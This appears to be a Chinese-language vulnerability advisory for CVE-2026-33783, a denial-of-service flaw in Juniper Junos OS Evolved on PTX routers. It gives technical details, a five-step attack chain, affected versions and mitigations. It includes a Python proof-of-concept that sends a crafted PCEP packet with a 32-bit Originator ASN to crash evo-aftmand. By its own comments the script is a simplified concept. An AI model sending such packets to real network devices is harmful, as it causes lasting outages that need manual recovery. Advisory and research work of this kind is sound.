CVE-2026-33783 Junos OS Evolved参数类型错误漏洞

漏洞信息

漏洞编号

CVE-2026-33783

漏洞类型

参数类型错误

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS Evolved (PTX Series)

漏洞概述

Juniper Networks Junos OS Evolved PTX系列设备在传感器接口中存在函数调用参数类型不正确的漏洞。具有低权限的远程攻击者可通过网络利用此漏洞造成拒绝服务。具体场景下，若通过PCEP配置彩色SRTE策略隧道并使用gRPC监控流量，当PCEP消息中的Originator ASN字段值大于65535（即32位ASN）时，会导致evo-aftmand进程崩溃且无法自动重启，造成持续的服务中断，系统需人工干预恢复。

技术细节

该漏洞位于Junos OS Evolved的`evo-aftmand`进程中，由函数调用时参数类型不匹配引起。当设备通过PCEP协议建立彩色SRTE（Segment Routing Traffic Engineering）策略隧道，并启用gRPC进行流量数据监控时，系统会解析PCEP消息中的Originator ASN字段。正常情况下，ASN通常为16位（最大65535），但该字段可能承载32位值。漏洞代码在处理该字段时，未能正确处理32位ASN值，将其以不正确的类型传递给后续函数调用。这种类型错误触发了运行时异常，导致`evo-aftmand`进程崩溃。由于该进程缺乏自动恢复机制，崩溃后服务持续不可用，导致大规模的拒绝服务。攻击者需具备网络访问权限及低级别的认证凭证即可发送特制的PCEP报文触发此漏洞。

攻击链分析

STEP 1

步骤1：信息收集

识别运行受影响Junos OS Evolved版本的Juniper PTX系列设备，并确认其配置了PCEP和gRPC监控。

STEP 2

步骤2：建立连接

攻击者利用低权限凭证建立与目标设备的PCEP会话连接。

STEP 3

步骤3：漏洞利用

通过PCEP会话发送特制的PCInitiate或PCUpdate消息，其中包含彩色SRTE策略隧道，并将Originator ASN字段设置为一个大于65535的32位数值（如70000）。

STEP 4

步骤4：触发崩溃

目标设备的evo-aftmand进程解析该字段时发生参数类型错误，触发异常并崩溃。

STEP 5

步骤5：持久拒绝服务

由于进程无法自动重启，导致服务持续中断，需管理员手动重启系统才能恢复。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-33783
# This script demonstrates the condition that triggers the crash in evo-aftmand.
# It sends a PCEP message with an Originator ASN > 65535.

import socket
import struct

def trigger_cve(target_ip, target_port=4189):
    """
    Sends a crafted PCEP message to trigger the Function Call With Incorrect Argument Type.
    """
    try:
        # PCEP Common Header (Version 1, Flags, Message Type, Length)
        # Type 2 = PCInitiate (example), Length varies
        pcep_header = struct.pack('!BBHI', 1, 0, 2, 32) # Simplified header

        # SRP Object (Stateful PCE Request Parameters)
        srp_obj = struct.pack('!HHI', 0x0020, 0, 0x10000000) # Simplified SRP

        # LSP Object with Originator ASN
        # The vulnerability triggers when Orig-ASN > 65535 (32-bit)
        malicious_asn = 70000 # 32-bit ASN value
        # Constructing LSP Object header + TLV for Originator ASN
        # This is a representation of the malformed data structure
        lsp_obj_header = struct.pack('!HHI', 0x0010, 0, 12) # Class=16, Type=0
        asn_tlv = struct.pack('!HHI', 0x0014, 0, malicious_asn) # TLV containing the large ASN

        payload = pcep_header + srp_obj + lsp_obj_header + asn_tlv

        print(f"[*] Sending malicious PCEP packet to {target_ip} with ASN={malicious_asn}")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))
        sock.send(payload)
        sock.close()
        print("[+] Payload sent. Check if evo-aftmand crashed.")

    except Exception as e:
        print(f"[-] Error: {e}")

# Note: This requires a valid PCEP session setup in a real scenario.
# The specific object structure depends on the exact PCEP implementation on the target.

影响范围

Junos OS Evolved on PTX Series < 22.4R3-S9-EVO

Junos OS Evolved on PTX Series 23.2 < 23.2R2-S6-EVO

Junos OS Evolved on PTX Series 23.4 < 23.4R2-S7-EVO

Junos OS Evolved on PTX Series 24.2 < 24.2R2-S4-EVO

Junos OS Evolved on PTX Series 24.4 < 24.4R2-S2-EVO

Junos OS Evolved on PTX Series 25.2 < 25.2R1-S2-EVO, 25.2R2-EVO

防御指南

临时缓解措施

临时缓解措施包括避免在PCEP中使用大于65535的32位ASN值配置彩色SRTE策略隧道，如果不需要gRPC流量监控功能，可暂时禁用该功能以降低风险。建议尽快应用官方补丁进行修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-33783
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-33783
3 Details https://www.cvedetails.com/cve/CVE-2026-33783/
4 VulDB https://vuldb.com/cve/CVE-2026-33783
5 Link https://kb.juniper.net/JSA107870